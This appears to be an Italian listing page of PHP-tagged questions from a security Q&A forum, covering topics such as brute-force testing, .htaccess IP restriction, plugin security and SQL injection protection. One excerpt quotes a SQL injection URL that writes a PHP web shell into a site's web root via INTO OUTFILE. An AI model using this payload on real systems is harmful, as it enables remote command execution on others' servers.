Domande con tag 'php'

domande con tag
2
risposte

Test del modulo di registrazione utilizzando la forza bruta

Ho bisogno di verificare se il modulo di registrazione del mio sito web può avere problemi con gli attacchi a forza bruta, perché questo modulo richiede un codice di invito. C'è qualche strumento per questo tipo di test?     
posta 03.09.2015 - 01:16
1
risposta

Perché la tecnica di SQL Injection INTO OUTFILE a volte non funziona? [chiuso]

Perché la tecnica di SQL Injection INTO OUTFILE a volte non funziona? http://example.com/file.php?id=1 union select 1,"<?php system($_REQUEST['cmd'])?>",3,4 INTO OUTFILE " /var/www/website/public_html/shell.php" C'è qualch...
posta 27.09.2015 - 00:35
1
risposta

È sicuro mostrare le pagine di amministrazione solo su determinati host?

Ho un sito web pubblico senza database (con contenuto statico). Ho una pagina di amministrazione, che consente di modificare il contenuto statico. Voglio usare quella pagina solo quando il sito web è sul mio computer locale ma non quando è caric...
posta 30.07.2016 - 13:28
2
risposte

Possibili problemi di sicurezza con l'immagine generata su richiesta dal database

Voglio sapere quale potrebbe essere il potenziale rischio con la visualizzazione di parte di questo comportamento. Per la parte di caricamento: Un modulo con un caricamento di file per l'immagine. Il contenuto dell'immagine è salvato...
posta 19.09.2014 - 00:10
1
risposta

.htaccess cartella protetta tranne IP

Ho creato un e-shop con e-book e sono memorizzati in una cartella specifica che è protetta da un file .htaccess: Order deny,allow deny from all allow from 127.0.0.1 L'IP è l'IP della pagina Web, quindi è inaccessibile a tutti tranne che agl...
posta 29.04.2015 - 12:04
2
risposte

PHP Plugin Security

Ho lavorato su un sistema di automazione domestica ora per poco più di un anno e ho aggiunto un sistema di plugin ad esso. Ho anche aggiunto così altri utenti possono inviare i loro plugin e se li accetto, vengono automaticamente aggiunti a tutt...
posta 13.02.2015 - 23:43
1
risposta

sospetto di virus sul sito web creato con PHP Codeigniter [duplicato]

Ho ricevuto un sito Web che utilizza Codeigniter per modificare. Il problema è che, a volte, quando aggiorno la pagina principale, verrà avviato il download di uno strano file denominato "download" con l'icona di Windows. Non sono sicuro di...
posta 20.06.2016 - 08:17
1
risposta

Protezione dell'iniezione SQL per i miei file PHP [chiuso]

Ho creato un forum PHP. Ho usato PDO, oltre a SQLi. Quando ho eseguito una scansione di sicurezza del mio sito Web, ha rilevato errori e, dopo un lungo periodo di tentativi diversi, non riesco a risolverli. Indica a chi mi aiuta a risolverli....
posta 24.07.2015 - 14:02
1
risposta

Puoi fare una crittografia lato client e server [duplicato]

Sto creando un sito Web PHP in cui gli utenti, tra le altre cose, possono accedere e fare cose amministrative. Per le loro password io uso password_hash ($ password) e successivamente verificare con esso, io uso password_verify ($ password, $...
posta 31.10.2015 - 15:25
1
risposta

Decrittografia AES a 128 bit utilizzando una chiave più lunga di 16 byte

Ho avuto un piccolo problema riguardo alla decrittazione di AES. Devo decodificare un testo che è stato crittografato con AES / ECB a 128 bit con PHP mcrypt. Il fatto è che la chiave usata per cifrare / decifrare è lunga 32 byte invece di 16. Qu...
posta 13.11.2014 - 15:54